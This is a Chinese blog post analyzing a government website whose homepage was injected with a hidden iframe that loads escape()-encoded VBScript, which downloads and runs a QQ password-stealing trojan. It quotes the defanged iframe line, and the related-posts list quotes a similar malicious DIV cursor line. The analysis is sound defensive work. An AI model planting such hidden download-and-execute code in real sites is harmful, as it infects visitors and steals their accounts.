某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码

最新推荐文章于 2025-12-18 16:31:11 发布
最新推荐文章于 2025-12-18 16:31:11 发布 · 97 阅读 · 0
文章标签:

#shell

本文分析了一个政府网站主页被植入的恶意代码案例。该代码通过隐藏的iframe加载了使用escape()加密的VBScript脚本,进一步下载并执行了特洛伊木马Trojan-PSW.Win32.QQShou.ix。

endurer 原创

2006-11-14 第1

该政府网站首页末被加入代码:
/--------
<iframe src=hxxp://www.***.race*swd.com/wm.htm width=0 height=0 frameborder=0></iframe>
--------/

wm.htm的内容为escape()加密的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.***.race*swd.com/1**.exe,保存为 %temp% 中的 asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

1**.exe 文件大小为36.7 KB (37,619 字节),Kaspersky 报为 Trojan-PSW.Win32.QQShou.ix

iteye_6637
关注
遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
gdfyug的博客
02-18 868
遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗2
Purpleendurer@优快云
04-15 1950
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗2endurer 原创2008-04-15 第1版(续1)开始修复~到 http://purpleendurer.ys168.com下载bat_do和FileInfo并运行,到 http://tool.kaka.com 下载安装瑞星卡卡安全助手并运行,扫描出4个流氓软件,清除它们,接着切换到[高级
行为分析 恶意下载感染者 Trojan-Downloader.Win32.Agent.ahpi
weixin_33978044的博客
10-01 1276
病毒名称:BitDefender:- Kaspersky:Trojan-Downloader.Win32.Agent.ahpi NOD32v2:a variant of Win32/TrojanDownloader.Agent.UGC Rising:Trojan.Win32.Undef.dvoVT扫...
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
Purpleendurer@优快云
04-09 1712
endurer 原创2007-04-09 第1版该论坛采用phpwind系统,被加入代码:/---<DIV style="CURSOR: url(hxxp://world***ao**fwr.net/level***/75***17*p.jpg)"></DIV>---/hxxp://world***ao**fwr.net/level***/75***17*p.jpg(Kaspers
Trojan/Win32.TDSS.eyj[Rootkit]分析
zacklin的专栏
07-24 1563
病毒标签: 病毒名称: Trojan/Win32.TDSS.eyj[Rootkit] 病毒类型: 后门 文件 MD5: 45433E3C1489F1F64798BC82BFA21864 公开范围: 完全公开 危害等级: 4 文件长度: 23,040 字节 感染系统: Windows98以上版本 开发工具: Microsoft Visual C++ 6.0 病毒描述: 该病毒为后
遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马
Purpleendurer@优快云
12-10 2472
endurer 原创2006-12-10 第1版一位友的电脑最近工作比较慢,让偶帮忙检修看看。到 http://endurer.ys168.com 下载 HijackThis 和 ProcView。先用 HijackThis 扫描 log,发现以下可疑项: /-------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (W
盗号木马Trojan-PSW.Win32.OLGame.vdh
04-13 945
病毒症状  该病毒是使用VC编写的盗号程序,由微点主动防御软件自动捕获,采用UPack加壳方式试图躲避特征码扫描,加壳后长度为19,936字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过木马、文件捆绑方式传播。病毒分析  该木马程序运行后,检测系统中是否存在avp.exe进程,如果有则通过相关API函数将%systemroot%/system32/drivers/be
遭遇木马Trojan-PWS.Win32.Agent.BU(续篇)
weixin_33736649的博客
11-12 927
一直以为那个木马Trojan-PWS.Win32.Agent.BU是同事的U盘上带过来的,直到后来在安装/卸载一个软件时无意中发现不是的(呵呵~真不好意思,错怪她了),事情还是从公司领导决定用禁U软件说起,通过第三方软件把在公司上下除了必要的几台电脑外一律禁用U盘,一方面是考虑到U盘是传播木马的最大根源,另一方面也防止信息从计算机USB端口泄漏出去,...
Trojan-Downloader.Win32.Generic.a...
06-08
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载木马类,病毒运行后调用API获取系统文件夹...
java-trojan-源码.rar
10-10
在"java-trojan-源码.rar"这个压缩包中,我们有机会深入研究Java木马的工作原理和结构,这对于提高安全意识和防范措施至关重要。 首先,我们需要理解Java平台的安全模型。Java的"Write Once, Run Anywhere"理念使得...
Trojan-Dropper.Win32.Dropkit.a清除工具
10-21
标题中的“Trojan-Dropper.Win32.Dropkit.a清除工具”表明了这是一个专门用于清除特定类型电脑病毒的工具包。这种病毒属于Windows平台上的特洛伊木马病毒(Trojan Horse),并且它是一个dropper,意味着它的主要功能...
sshpass-1.06.tar.gz.zip
05-22
上看很多mac安装sshpass都是通过wget http://sourceforge.net/projects/sshpass/files/sshpass/1.05/sshpass-1.05.tar.gz或者brew命令来安装,但是发现下载下来的安装包都解压不了或者被墙挡住,最后无奈把这个...
APK,一次“重打包”,一次失控:APK 后门植入原理与防范实战
最新发布
2401_84830066的博客
12-18 387
【摘要】本文通过技术实验演示了Android APK重打包与后门植入过程,使用Apktool反编译合法应用并注入Meterpreter后门代码。重点展示了反编译、代码注入、重打包签名等关键步骤,同时强调该技术仅限合法安全研究用途。文章揭示了此类攻击的危害性,包括远程控制、隐私窃取等风险,并提供了用户和开发者的防护建议,如仅从官方渠道下载应用、启用代码混淆等。最后重申络安全责任,呼吁技术应用需符合法律规范。(149字)
【MongoDB实战】4.5 综合实战:用户信息管理模块(CRUD完整流程)
kngines
12-15 825
本文介绍了用户信息管理模块的完整实现流程,包括需求分析、数据模型设计和CRUD操作。核心需求涵盖用户注册、查询、修改和删除功能,并定义了11个核心字段。数据模型设计部分展示了mongo shell和Node.js/mongoose两种实现方式,包含集合创建、索引设置和Schema定义。实战部分详细演示了用户注册操作,包括批量插入测试数据(mongo shell)和单个用户注册(Node.js),其中Node.js实现包含了密码加密、数据校验等安全措施。
Shell脚本中变量默认值赋值总结
zhaominyong的专栏
12-15 284
代码Shell脚本中变量默认值赋值总结。
系统核心解析:深入操作系统内部机制——基础I/O探秘:文件描述符、重定向与Shell的I/O魔法(一)
2401_82924480的博客
12-15 691
系统核心解析:深入操作系统内部机制——基础I/O探秘:文件描述符、重定向与Shell的I/O魔法(一)
ubuntu常用命令
12-14 728
允许执行命令。在 Ubuntu 等现代 Linux 发行版中,出于安全考虑,默认禁用 root 登录,而是通过sudo临时提权。:sudo或更准确地说是。它的本意是“以另一个用户的身份执行(命令)”,默认是 root 用户。第一次使用sudo时通常需要输入(不是 root 密码),验证通过后短时间内再次使用无需重复输入。
sshd除了远程shell外还有哪些功能
zfj321的博客
12-18 650
SSH(Secure Shell)是一种加密络协议,主要用于远程登录和安全管理。其核心功能包括:1)交互式Shell访问,通过ssh user@host登录远程服务器;2)远程命令执行,直接运行单条命令;3)SFTP安全文件传输,支持上传下载等操作;4)本地端口转发(-L),将本地端口映射到远程络;5)远程端口转发(-R),让外部访问本地服务;6)SSH代理转发(-A),安全地通过跳板机连接内服务器。这些功能通过加密隧道保障数据传输安全,是系统管理和络运维的重要工具。
高效清除木马威胁的 AVGAS 7.5.1.43-3 专杀工具
木马,全称为特洛伊木马Trojan horse),是一种常见的计算机恶意软件类型,它以一种隐藏的方式潜入用户的系统中,并在不知情的情况下执行恶意操作。木马通常不包含自我复制的功能,但可以进行诸如窃取信息、监控...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值